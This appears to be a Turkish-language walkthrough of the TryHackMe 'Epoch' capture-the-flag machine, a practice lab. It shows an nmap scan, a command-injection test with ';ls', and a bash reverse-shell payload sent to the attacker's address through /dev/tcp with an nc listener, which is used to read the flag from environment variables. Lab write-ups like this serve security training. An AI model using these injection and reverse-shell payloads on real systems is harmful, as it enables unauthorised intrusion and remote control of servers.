Table of Contents
Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “Epoch” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…
Çözüm
1 — Nmap aracını kullanarak makine üzerindeki açık portlar ve servisler hakkında detaylı bilgi ediniyorum.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -sS -sV 10.10.55.195
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-24 14:06 EDT
Nmap scan report for 10.10.55.195
Host is up (0.069s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http
2 — Command Injection saldırısı testi yapıyorum. “;” koyarak ls komutunu çalıştırdığımda bir çıktı elde edebiliyorum.
Payload -> ;ls
date: invalid date '@'
go.mod
go.sum
main
main.go
views
3 — Bash reverse shell komutu girip bir bağlantı alıyorum. Daha sonra çevre değişkenlerinde bayrağı elde ediyorum.
Payload -> ;bash -i >& /dev/tcp/10.8.94.51/4444 0>&1
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.8.94.51] from (UNKNOWN) [10.10.55.195] 49686
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
challenge@e7c1352e71ec:~$ whoami
whoami
challenge
challenge@e7c1352e71ec:~$ ls
ls
go.mod
go.sum
main
main.go
views
challenge@e7c1352e71ec:~$ env
env
HOSTNAME=e7c1352e71ec
PWD=/home/challenge
HOME=/home/challenge
LS_COLORS=
GOLANG_VERSION=1.15.7
FLAG=*CENSORED*
SHLVL=2
PATH=/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
_=/usr/bin/env